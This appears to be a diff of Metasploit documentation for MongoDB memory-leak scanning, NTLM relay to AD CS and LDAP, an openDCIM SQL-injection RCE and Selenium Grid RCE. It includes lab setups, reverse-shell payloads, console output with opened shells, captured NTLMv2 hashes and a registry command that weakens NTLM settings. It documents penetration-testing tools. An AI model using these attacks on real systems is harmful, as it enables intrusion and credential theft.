 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set SAVE_RAW_RESPONSES true
+SAVE_RAW_RESPONSES => true
 msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
 
-[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
-[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
+[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
+[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
 ...
 
-[+] 192.168.1.100:27017 - Total leaked: 1703 bytes
-[+] 192.168.1.100:27017 - Unique fragments: 13
+[+] 192.168.1.100:27017 - Total leaked: 703 bytes
+[+] 192.168.1.100:27017 - Unique fragments: 8
 [+] 192.168.1.100:27017 - Leaked data saved to: /root/.msf4/loot/20251230_mongobleed.bin
 [+] 192.168.1.100:27017 - Raw responses saved to: /root/.msf4/loot/20251230_mongobleed_raw.bin
 ```
 
 You can then analyze the raw responses offline:
-```bash
+
+```
 strings /root/.msf4/loot/20251230_mongobleed_raw.bin | grep -i password
 ```
 
-### Server Without zlib Compression
-
-```
-msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
-msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
-
-[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
-[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
-[*] 192.168.1.100:27017 - Server compressors: snappy
-[-] 192.168.1.100:27017 - Server does not support zlib compression - vulnerability not exploitable
-[*] 192.168.1.100:27017 - The CVE-2025-14847 vulnerability requires zlib compression to be enabled
-[*] Auxiliary module execution completed
-```
-
 ## Technical Details
 
 ### How the Vulnerability Works
 
-The vulnerability exists in MongoDB's `message_compressor_zlib.cpp`. The bug was caused by returning `output.length()` (the allocated buffer size) instead of the actual decompressed data length. This allowed attackers to:
+The vulnerability exists in MongoDB's `message_compressor_zlib.cpp`. The bug was caused by returning `output.length()` (the allocated
+buffer size) instead of the actual decompressed data length. This allowed attackers to:
 
 1. Send a compressed message claiming a large uncompressed size
 2. MongoDB allocates a buffer based on the claimed size
@@ -324,7 +322,12 @@ The vulnerability exists in MongoDB's `message_compressor_zlib.cpp`. The bug was
 
 ### Detection Technique
 
-The Wiz Research "magic packet" used in the `check` method sends a minimal BSON document `{"a": 1}` inside a malformed `OP_COMPRESSED` message with an inflated `uncompressedSize` field. If the server responds with BSON signatures or field name errors containing unexpected data, the vulnerability is confirmed.
+The Wiz Research "magic packet" used in the `check` command sends a minimal BSON document `{"a": 1}` inside a malformed
+`OP_COMPRESSED` message with an inflated `uncompressedSize` field. If the server responds with BSON parsing errors, the vulnerability
+is confirmed, since a patched server rejects the inflated size before parsing.
+
+The module validates that the target is actually a MongoDB service before probing, preventing false positives against non-MongoDB
+services. Standard MongoDB error message strings are filtered from leak results to avoid reporting server error text as leaked memory.
 
 ## References
 

documentation/modules/auxiliary/server/relay/esc8.md

@@ -33,9 +33,60 @@ The template to issue if MODE is SPECIFIC_TEMPLATE.
 
 ## Scenarios
 
-### Version and OS
+### NTLM
 
 ```
+msf auxiliary(server/relay/esc8) > show options
+
+Module options (auxiliary/server/relay/esc8):
+
+   Name           Current Setting            Required  Description
+   ----           ---------------            --------  -----------
+   ALT_DNS                                   no        Alternative certificate DNS
+   ALT_SID                                   no        Alternative object SID
+   ALT_UPN        Administrator@example.com  no        Alternative certificate UPN (format: USER@DOMAIN)
+   CAINPWFILE                                no        Name of file to store Cain&Abel hashes in. Only supports NTLMv1 hashes. Can
+                                                       be a path.
+   JOHNPWFILE                                no        Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 ha
+                                                       shes, each of which is stored in separate files. Can also be a path.
+   MODE           SPECIFIC_TEMPLATE          yes       The issue mode. (Accepted: ALL, AUTO, QUERY_ONLY, SPECIFIC_TEMPLATE)
+   ON_BEHALF_OF                              no        Username to request on behalf of (format: DOMAIN\USER)
+   PFX                                       no        Certificate to request on behalf of
+   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported prox
+                                                       ies: socks5h, sapni, socks4, http, socks5
+   RELAY_TIMEOUT  25                         yes       Seconds that the relay socket will wait for a response after the client has
+                                                       initiated communication.
+   RHOSTS         10.5.132.180               yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/ba
+                                                       sics/using-metasploit.html
+   RPORT          80                         yes       The target port (TCP)
+   SMBDomain      WORKGROUP                  yes       The domain name used during SMB exchange.
+   SRVHOST        0.0.0.0                    yes       The local host or network interface to listen on. This must be an address on
+                                                        the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT        445                        yes       The local port to listen on.
+   SRV_TIMEOUT    25                         yes       Seconds that the server socket will wait for a response after the client has
+                                                        initiated communication.
+   SSL            false                      no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI      /certsrv/                  yes       The URI for the cert server.
+   VHOST                                     no        HTTP server virtual host
+
+
+   When MODE is SPECIFIC_TEMPLATE:
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   CERT_TEMPLATE  ESC1-Template    no        The template to issue if MODE is SPECIFIC_TEMPLATE.
+
+
+Auxiliary action:
+
+   Name   Description
+   ----   -----------
+   Relay  Run SMB ESC8 relay server
+
+
+
+View the full module info with the info, or info -d command.
+
 msf auxiliary(server/relay/esc8) > run
 [*] Auxiliary module running as background job 1.
 msf auxiliary(server/relay/esc8) > 
@@ -63,3 +114,157 @@ msf auxiliary(server/relay/esc8) >
 [*] Received request for MSFLAB\smcintyre
 [*] Identity: MSFLAB\smcintyre - All targets relayed to
 ```
+
+
+### NTLM and ESC1
+
+```
+msf auxiliary(server/relay/esc8) > show options
+
+Module options (auxiliary/server/relay/esc8):
+
+   Name           Current Setting            Required  Description
+   ----           ---------------            --------  -----------
+   ALT_DNS                                   no        Alternative certificate DNS
+   ALT_SID                                   no        Alternative object SID
+   ALT_UPN        Administrator@example.com  no        Alternative certificate UPN (format: USER@DOMAIN)
+   CAINPWFILE                                no        Name of file to store Cain&Abel hashes in. Only supports NTLMv1 hashes. Can
+                                                       be a path.
+   JOHNPWFILE                                no        Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 ha
+                                                       shes, each of which is stored in separate files. Can also be a path.
+   MODE           SPECIFIC_TEMPLATE          yes       The issue mode. (Accepted: ALL, AUTO, QUERY_ONLY, SPECIFIC_TEMPLATE)
+   ON_BEHALF_OF                              no        Username to request on behalf of (format: DOMAIN\USER)
+   PFX                                       no        Certificate to request on behalf of
+   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported prox
+                                                       ies: socks5h, sapni, socks4, http, socks5
+   RELAY_TIMEOUT  25                         yes       Seconds that the relay socket will wait for a response after the client has
+                                                       initiated communication.
+   RHOSTS         10.5.132.180               yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/ba
+                                                       sics/using-metasploit.html
+   RPORT          80                         yes       The target port (TCP)
+   SMBDomain      WORKGROUP                  yes       The domain name used during SMB exchange.
+   SRVHOST        0.0.0.0                    yes       The local host or network interface to listen on. This must be an address on
+                                                        the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT        445                        yes       The local port to listen on.
+   SRV_TIMEOUT    25                         yes       Seconds that the server socket will wait for a response after the client has
+                                                        initiated communication.
+   SSL            false                      no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI      /certsrv/                  yes       The URI for the cert server.
+   VHOST                                     no        HTTP server virtual host
+
+
+   When MODE is SPECIFIC_TEMPLATE:
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   CERT_TEMPLATE  ESC1-Template    no        The template to issue if MODE is SPECIFIC_TEMPLATE.
+
+
+Auxiliary action:
+
+   Name   Description
+   ----   -----------
+   Relay  Run SMB ESC8 relay server
+
+
+
+View the full module info with the info, or info -d command.
+
+msf auxiliary(server/relay/esc8) > run
+[*] Auxiliary module running as background job 0.
+msf auxiliary(server/relay/esc8) > 
+[*] SMB Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+[*] New request from 10.5.132.122
+[*] Received request for \msfuser
+[*] Relaying to next target http://10.5.132.180:80/certsrv/
+[+] Identity: \msfuser - Successfully authenticated against relay target http://10.5.132.180:80/certsrv/
+[SMB] NTLMv2-SSP Client     : 10.5.132.180
+[SMB] NTLMv2-SSP Username   : \msfuser
+[SMB] NTLMv2-SSP Hash       : msfuser:::af0b69bf0b95c55e:db5ce84b2f41b82d7df93bd2566c06b6:0101000000000000cbf836e63587dc013ce37255fbca75410000000002000e004500580041004d0050004c00450001001e00570049004e002d00440052004300390048004300440049004d0041005400040016006500780061006d0070006c0065002e0063006f006d0003003600570049004e002d00440052004300390048004300440049004d00410054002e006500780061006d0070006c0065002e0063006f006d00050016006500780061006d0070006c0065002e0063006f006d0007000800cbf836e63587dc01060004000200000008003000300000000000000000000000003000002ad3656a59fe53f773d5bc3852373338e1f3270cdbdf9411b84ef184151925510a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e003200300031000000000000000000
+
+[+] Certificate generated using template ESC1-Template and \msfuser
+[+] Certificate for \msfuser using template ESC1-Template saved to /home/tmoose/.msf4/loot/20260116161729_default_10.5.132.180_windows.ad.cs_994769.pfx
+[*] Received request for \msfuser
+[*] Identity: \msfuser - All targets relayed to
+
+```
+
+### NTLM and ESC2
+```msf
+msf auxiliary(server/relay/esc8) > show options
+
+Module options (auxiliary/server/relay/esc8):
+
+   Name           Current Setting                       Required  Description
+   ----           ---------------                       --------  -----------
+   ALT_DNS                                              no        Alternative certificate DNS
+   ALT_SID                                              no        Alternative object SID
+   ALT_UPN                                              no        Alternative certificate UPN (format: USER@DOMAIN)
+   CAINPWFILE                                           no        Name of file to store Cain&Abel hashes in. Only supports NTLMv1 h
+                                                                  ashes. Can be a path.
+   JOHNPWFILE                                           no        Name of file to store JohnTheRipper hashes in. Supports NTLMv1 an
+                                                                  d NTLMv2 hashes, each of which is stored in separate files. Can a
+                                                                  lso be a path.
+   MODE           SPECIFIC_TEMPLATE                     yes       The issue mode. (Accepted: ALL, AUTO, QUERY_ONLY, SPECIFIC_TEMPLA
+                                                                  TE)
+   ON_BEHALF_OF   EXAMPLE\Administrator                 no        Username to request on behalf of (format: DOMAIN\USER)
+   PFX            /home/tmoose/.msf4/loot/202601161509  no        Certificate to request on behalf of
+                  11_default_10.5.132.180_windows.ad.c
+                  s_854591.pfx
+   Proxies                                              no        A proxy chain of format type:host:port[,type:host:port][...]. Sup
+                                                                  ported proxies: socks5h, sapni, socks4, http, socks5
+   RELAY_TIMEOUT  25                                    yes       Seconds that the relay socket will wait for a response after the
+                                                                  client has initiated communication.
+   RHOSTS         10.5.132.180                          yes       The target host(s), see https://docs.metasploit.com/docs/using-me
+                                                                  tasploit/basics/using-metasploit.html
+   RPORT          80                                    yes       The target port (TCP)
+   SMBDomain      WORKGROUP                             yes       The domain name used during SMB exchange.
+   SRVHOST        0.0.0.0                               yes       The local host or network interface to listen on. This must be an
+                                                                   address on the local machine or 0.0.0.0 to listen on all address
+                                                                  es.
+   SRVPORT        445                                   yes       The local port to listen on.
+   SRV_TIMEOUT    25                                    yes       Seconds that the server socket will wait for a response after the
+                                                                   client has initiated communication.
+   SSL            false                                 no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI      /certsrv/                             yes       The URI for the cert server.
+   VHOST                                                no        HTTP server virtual host
+
+
+   When MODE is SPECIFIC_TEMPLATE:
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   CERT_TEMPLATE  User             no        The template to issue if MODE is SPECIFIC_TEMPLATE.
+
+
+Auxiliary action:
+
+   Name   Description
+   ----   -----------
+   Relay  Run SMB ESC8 relay server
+
+
+
+View the full module info with the info, or info -d command.
+
+msf auxiliary(server/relay/esc8) > run
+[*] Auxiliary module running as background job 0.
+msf auxiliary(server/relay/esc8) > 
+[*] SMB Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+[*] New request from 10.5.132.122
+[*] Received request for \msfuser
+[*] Relaying to next target http://10.5.132.180:80/certsrv/
+[+] Identity: \msfuser - Successfully authenticated against relay target http://10.5.132.180:80/certsrv/
+[SMB] NTLMv2-SSP Client     : 10.5.132.180
+[SMB] NTLMv2-SSP Username   : \msfuser
+[SMB] NTLMv2-SSP Hash       : msfuser:::916940a20e939a34:7f5150c74cba44513fcb2e7ed28e8f45:0101000000000000bf1765b93787dc01c7c75e835e16b4ad0000000002000e004500580041004d0050004c00450001001e00570049004e002d00440052004300390048004300440049004d0041005400040016006500780061006d0070006c0065002e0063006f006d0003003600570049004e002d00440052004300390048004300440049004d00410054002e006500780061006d0070006c0065002e0063006f006d00050016006500780061006d0070006c0065002e0063006f006d0007000800bf1765b93787dc01060004000200000008003000300000000000000000000000003000002ad3656a59fe53f773d5bc3852373338e1f3270cdbdf9411b84ef184151925510a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e003200300031000000000000000000
+
+[+] Certificate generated using template User and \msfuser
+[+] Certificate for \msfuser using template User saved to /home/tmoose/.msf4/loot/20260116163102_default_10.5.132.180_windows.ad.cs_883392.pfx
+[*] Received request for \msfuser
+[*] Identity: \msfuser - All targets relayed to
+
+
+```

documentation/modules/auxiliary/server/relay/http_to_ldap.md

@@ -0,0 +1,108 @@
+## Vulnerable Application
+
+### Description
+
+This module sets up an HTTP server that attempts to execute an NTLM relay attack against an LDAP server on the
+configured `RHOSTS`. The relay attack targets NTLMv1 authentication, as NTLMv2 cannot be relayed to LDAP due to the
+Message Integrity Check (MIC). The module automatically removes the relevant flags to bypass signing.
+
+This module supports relaying one HTTP authentication attempt to multiple LDAP servers. After attempting to relay to
+one target, the relay server sends a 307 to the client and if the client is configured to respond to redirects, the
+client resends the NTLMSSP_NEGOTIATE request to the relay server. Multi relay will not work if the client does not
+respond to redirects.
+
+The module supports relaying NTLM authentication which has been wrapped in GSS-SPNEGO. HTTP authentication info is sent
+in the WWW-Authenticate header. In the auth header base64 encoded NTLM messages are denoted with the NTLM prefix, while
+GSS wrapped NTLM messages are denoted with the Negotiate prefix. Note that in some cases non-GSS wrapped NTLM auth can
+be prefixed with Negotiate.
+
+If the relay attack is successful, an LDAP session is created on the target. This session can be used by other modules
+that support LDAP sessions, such as:
+
+- `admin/ldap/rbcd`
+- `auxiliary/gather/ldap_query`
+
+The module also supports capturing NTLMv1 and NTLMv2 hashes.
+
+### Setup
+
+For this relay attack to be successful, it is important to understand the difference between the Target Server (the
+Domain Controller receiving the relayed authentication) and the Victim Client (the machine sending the initial HTTP
+request) and how their respective configurations can impact the success of the attack.
+
+The Domain Controller must be configured to accept LM or NTLM authentication. This means the `LmCompatibilityLevel`
+registry key on the DC must be set to 4 or lower. If it is set to `5` ("Send NTLMv2 response only. Refuse
+LM and NTLM"), the DC will reject the relayed authentication and the module will fail.
+
+You can verify or modify the Domain Controller's level using the following commands:
+```cmd
+# To check the current level:
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa -v LmCompatibilityLevel
+
+# To set the level to 4 (or lower):
+reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa -v LmCompatibilityLevel /t REG_DWORD /d 0x4 /f
+```
+
+The client being coerced must be willing to send the vulnerable NTLM responses.
+- Non-Windows Clients: Custom tools or Linux-based HTTP clients are unaffected by Windows registry keys and can easily
+be relayed to a vulnerable DC.
+- Windows Clients: If you are coercing a native Windows HTTP client (like `Invoke-WebRequest` or a browser), the victim
+machine's `LmCompatibilityLevel` dictates what it is allowed to send. To successfully relay a Windows client, its local
+registry key typically needs to be set to `2` or lower. If the Windows client is operating at level `3` or higher, it
+restricts itself to sending only NTLMv2 responses, which will cause the relay to fail even if the target DC is vulnerable.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/server/relay/http_to_ldap`  
+3. Set the `RHOSTS` options
+4. Run the module
+5. Send an authentication attempt to the relay server
+   6. `Invoke-WebRequest -Uri http://192.0.2.1/test -UseDefaultCredentials`
+7. Check the output for successful relays and captured hashes
+
+## Scenarios
+### Relaying to multiple targets
+```
+msf auxiliary(server/relay/http_to_ldap) > set rhosts 172.16.199.200 172.16.199.201
+rhosts => 172.16.199.200 172.16.199.201
+msf auxiliary(server/relay/http_to_ldap) > run
+[*] Auxiliary module running as background job 2.
+
+[*] Relay Server started on 0.0.0.0:80
+[*] Server started.
+msf auxiliary(server/relay/http_to_ldap) > [*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
+[*] Processing request in state unauthenticated from 172.16.199.130
+[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
+[*] Processing request in state unauthenticated from 172.16.199.130
+[*] Received Type 1 message from 172.16.199.130, attempting to relay...
+[*] Attempting to relay to ldap://172.16.199.201:389
+[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
+[*] Received type2 from target ldap://172.16.199.201:389, attempting to relay back to client
+[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
+[*] Processing request in state awaiting_type3 from 172.16.199.130
+[*] Received Type 3 message from 172.16.199.130, attempting to relay...
+[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
+[+] Identity: KERBEROS\Administrator - Successfully relayed NTLM authentication to LDAP!
+[+] Relay succeeded
+[*] Moving to next target (172.16.199.200). Issuing 307 Redirect to /ZdF7Ufkm0I
+[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
+[*] Processing request in state unauthenticated from 172.16.199.130
+[*] Received Type 1 message from 172.16.199.130, attempting to relay...
+[*] Attempting to relay to ldap://172.16.199.200:389
+[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
+[*] Received type2 from target ldap://172.16.199.200:389, attempting to relay back to client
+[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
+[*] Processing request in state awaiting_type3 from 172.16.199.130
+[*] Received Type 3 message from 172.16.199.130, attempting to relay...
+[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
+[+] Identity: KERBEROS\Administrator - Successfully relayed NTLM authentication to LDAP!
+[+] Relay succeeded
+[*] Target list exhausted for 172.16.199.130. Closing connection.
+msf auxiliary(server/relay/http_to_ldap) > sessions -i -1
+[*] Starting interaction with 5...
+
+LDAP (172.16.199.200) > getuid
+[*] Server username: KERBEROS\Administrator
+LDAP (172.16.199.200) >
+```

documentation/modules/exploit/linux/http/opendcim_install_sqli_rce.md

@@ -0,0 +1,231 @@
+## Vulnerable Application
+
+This module exploits a SQL injection vulnerability in openDCIM's `install.php` endpoint
+(CVE-2026-28515) to achieve remote code execution.
+
+After installation, `install.php` remains accessible and processes LDAP configuration
+parameters via `UpdateParameter()` without authentication or input sanitization. The
+attacker injects stacked SQL queries through the LDAP form to overwrite the Graphviz
+`dot` binary path in `fac_Config`, then triggers `report_network_map.php` which calls
+`exec()` with the poisoned value.
+
+### Affected Versions
+
+openDCIM version 23.04 (last public release), through commit 4467e9c4, is affected. Tested up to 25.01.
+
+### Attack Chain
+
+1. POST to `install.php` with stacked SQL via LDAP parameters (CWE-862 + CWE-89)
+2. Backup original config, overwrite `dot` parameter with command payload
+3. GET `report_network_map.php` which calls `exec()` with the poisoned `dot` value (CWE-78)
+4. Restore original configuration from backup table
+
+## Lab Setup
+
+### Docker (Recommended)
+
+The official openDCIM Docker image (`opendcim/opendcim`) ships with no authentication
+configured. openDCIM delegates auth entirely to Apache via `$_SERVER['REMOTE_USER']` -
+without it, every page errors out. Real-world Docker deployments work around this by adding
+`SetEnv REMOTE_USER dcim` to the Apache vhost, which sets `REMOTE_USER` for every request
+without any actual credential check. This makes the entire application unauthenticated.
+
+The lab reproduces this scenario. Create the following files:
+
+**docker-compose.yml:**
+
+```yaml
+services:
+  web:
+    build: .
+    container_name: opendcim-lab
+    ports:
+      - "18091:80"
+    environment:
+      OPENDCIM_DB_HOST: db
+    depends_on:
+      db:
+        condition: service_healthy
+
+  db:
+    image: mariadb:10.7
+    container_name: opendcim-db
+    environment:
+      MARIADB_ROOT_PASSWORD: rootpass
+      MARIADB_DATABASE: dcim
+      MARIADB_USER: dcim
+      MARIADB_PASSWORD: dcim
+    volumes:
+      - db_data:/var/lib/mysql
+    healthcheck:
+      test: ["CMD", "mariadb", "-udcim", "-pdcim", "-e", "SELECT 1"]
+      interval: 5s
+      timeout: 5s
+      retries: 20
+
+volumes:
+  db_data:
+```
+
+**Dockerfile:**
+
+```dockerfile
+FROM opendcim/opendcim:24.01-beta
+COPY 000-default.conf /etc/apache2/sites-available/
+```
+
+**000-default.conf:**
+
+```apache
+<VirtualHost *:80>
+        ServerAdmin webmaster@localhost
+        DocumentRoot /var/www/html
+        <Directory "/var/www/html">
+           Options -Indexes
+           AllowOverride All
+           SetEnv REMOTE_USER dcim
+        </Directory>
+        AllowEncodedSlashes On
+        ErrorLog ${APACHE_LOG_DIR}/error.log
+        CustomLog ${APACHE_LOG_DIR}/access.log combined
+</VirtualHost>
+```
+
+Then run:
+
+```bash
+docker compose up -d
+```
+
+This starts openDCIM on port 18091 with `SetEnv REMOTE_USER dcim`, reproducing how Docker
+deployments are configured in the wild. No HTTP credentials are needed.
+
+**Note:** If the target uses HTTP Basic Auth (htpasswd/LDAP), set `HttpUsername` and
+`HttpPassword` accordingly. Any valid Apache credential is enough - `install.php` has no
+role check.
+
+**Note:** The fetch payload handler is not supported with Target 0 (Unix/Linux Command Shell)
+since standard fetch tools (curl, wget, etc.) are typically not available in the target's
+execution context (`exec()` via Graphviz dot path).
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/linux/http/opendcim_install_sqli_rce`
+3. `set RHOSTS <target>`
+4. `set RPORT <port>`
+5. `set HttpUsername <user>` (if Basic Auth is configured)
+6. `set HttpPassword <pass>`
+7. `set LHOST <attacker_ip>`
+8. `set payload cmd/unix/reverse_bash`
+9. `check`
+10. `exploit`
+11. You should get a shell as the Apache user (typically `www-data`)
+
+## Options
+
+### HttpUsername (Advanced)
+
+HTTP Basic Auth username. Leave empty for deployments using Apache `SetEnv REMOTE_USER`.
+
+### HttpPassword (Advanced)
+
+HTTP Basic Auth password. Leave empty for deployments using Apache `SetEnv REMOTE_USER`.
+
+## Scenarios
+
+### openDCIM 24.01 on Ubuntu - Command Shell (Target 0)
+
+```
+msf6 > use exploit/linux/http/opendcim_install_sqli_rce
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RPORT 18091
+RPORT => 18091
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set HttpUsername dcim
+HttpUsername => dcim
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set HttpPassword dcim
+HttpPassword => dcim
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set LHOST 192.168.64.1
+LHOST => 192.168.64.1
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > check
+[*] install.php is accessible, testing time-based SQL injection
+[*] Test 1/3: SLEEP(5)
+[*] Elapsed time: 5.1 seconds.
+[*] Test 2/3: SLEEP(4)
+[*] Elapsed time: 4.0 seconds.
+[*] Test 3/3: SLEEP(6)
+[*] Elapsed time: 6.1 seconds.
+[+] 127.0.0.1:18091 - The target appears to be vulnerable. Successfully tested SQL injection (3/3 delay checks passed).
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > exploit
+[*] Started reverse TCP handler on 192.168.64.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Successfully tested SQL injection (3/3 delay checks passed).
+[*] Performing LORI attack (LDAP Override Remote Injection)
+[*] Triggering exec() via report_network_map.php
+[*] Restoring original configuration
+[+] Configuration restored successfully.
+[*] Command shell session 1 opened (192.168.64.1:4444 -> 192.168.64.3:45678) at 2026-02-28 15:00:00 +0100
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+
+### openDCIM 24.01 on Ubuntu - Meterpreter via CmdStager (Target 1)
+
+```
+msf6 > use exploit/linux/http/opendcim_install_sqli_rce
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RPORT 18091
+RPORT => 18091
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set HttpUsername dcim
+HttpUsername => dcim
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set HttpPassword dcim
+HttpPassword => dcim
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set LHOST 192.168.64.1
+LHOST => 192.168.64.1
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set target 1
+target => 1
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > exploit
+[*] Started reverse TCP handler on 192.168.64.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Successfully tested SQL injection (3/3 delay checks passed).
+[*] Executing command stager
+[*] Sending stager progress: 100.00% (250/250 bytes)
+[*] Restoring original configuration
+[+] Configuration restored successfully.
+[*] Sending stage (3045380 bytes) to 192.168.64.3
+[*] Meterpreter session 1 opened (192.168.64.1:4444 -> 192.168.64.3:54321) at 2026-02-28 15:05:00 +0100
+
+meterpreter > getuid
+Server username: www-data
+```
+
+### openDCIM with SetEnv REMOTE_USER (No Basic Auth)
+
+```
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RPORT 80
+RPORT => 80
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > unset HttpUsername
+Unsetting HttpUsername...
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > unset HttpPassword
+Unsetting HttpPassword...
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(linux/http/opendcim_install_sqli_rce) > exploit
+[*] Started reverse TCP handler on 192.168.1.50:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Successfully tested SQL injection (3/3 delay checks passed).
+[*] Performing LORI attack (LDAP Override Remote Injection)
+[*] Triggering exec() via report_network_map.php
+[*] Restoring original configuration
+[+] Configuration restored successfully.
+[*] Command shell session 1 opened (192.168.1.50:4444 -> 192.168.1.100:54321) at 2026-02-28 15:10:00 +0100
+```

documentation/modules/exploit/linux/http/selenium_greed_rce.md

@@ -0,0 +1,197 @@
+## Vulnerable Application
+
+Selenium Grid and Selenoid expose a WebDriver API that allows creating browser sessions
+with arbitrary capabilities. When deployed without authentication (the default for both),
+an attacker can achieve remote code execution through two browser-specific techniques:
+
+**Chrome (binary override):** The `goog:chromeOptions` binary field can be set to an
+arbitrary executable such as `/usr/bin/python3`, since ChromeDriver does not validate it.
+This was fixed in Selenium Grid 4.11.0 via the stereotype capabilities merge. All Selenoid
+versions remain vulnerable.
+
+**Firefox (profile handler):** A custom profile containing a malicious MIME handler that maps
+`application/sh` to `/bin/sh` can be injected via `moz:firefoxOptions`. Navigating to a
+`data:` URI with that content type triggers shell execution. This technique has never been
+patched and works on all Selenium Grid versions including the latest release (4.40.0 at the
+time of writing). This was originally reported in
+[SeleniumHQ/selenium#9526](https://github.com/SeleniumHQ/selenium/issues/9526) in May 2021.
+
+The module auto-detects available browsers and selects the best attack vector. Firefox is
+preferred as it works on all Grid versions.
+
+The default Docker images run as `seluser`/`selenium` with passwordless sudo, allowing
+trivial privilege escalation to root.
+
+The vulnerability affects:
+
+    * Selenium Grid < 4.11.0 with Chrome nodes (binary override)
+    * Selenium Grid - all versions with Firefox nodes (profile handler, unpatched)
+    * Selenoid - all versions with Chrome or Firefox (project archived December 2024)
+
+This module was successfully tested on:
+
+    * selenium/standalone-chrome:4.10.0 on Ubuntu 24.04 (Chrome binary override)
+    * selenium/standalone-firefox:4.10.0 on Ubuntu 24.04 (Firefox profile handler)
+    * selenium/standalone-firefox:latest (4.40.0) on Ubuntu 24.04 (Firefox profile handler)
+    * Selenoid 1.11.3 with selenoid/chrome:128.0 on Ubuntu 24.04 (Chrome binary override)
+
+### Installation (Selenium Grid - Firefox)
+
+1. `docker pull selenium/standalone-firefox:latest`
+
+2. `docker run -d -p 4444:4444 --shm-size="2g" selenium/standalone-firefox:latest`
+
+### Installation (Selenium Grid - Chrome)
+
+1. `docker pull selenium/standalone-chrome:4.10.0`
+
+2. `docker run -d -p 4444:4444 --shm-size="2g" selenium/standalone-chrome:4.10.0`
+
+### Installation (Selenoid)
+
+1. Create `browsers.json`:
+```json
+{
+  "chrome": {
+    "default": "128.0",
+    "versions": {
+      "128.0": {
+        "image": "selenoid/chrome:128.0",
+        "port": "4444",
+        "path": "/"
+      }
+    }
+  }
+}
+```
+
+2. `docker pull selenoid/chrome:128.0`
+
+3. Start Selenoid:
+```
+docker run -d -p 4444:4444 \
+  -e DOCKER_API_VERSION=1.44 \
+  -v $(pwd)/browsers.json:/etc/selenoid/browsers.json:ro \
+  -v /var/run/docker.sock:/var/run/docker.sock \
+  aerokube/selenoid:latest-release
+```
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/selenium_greed_rce`
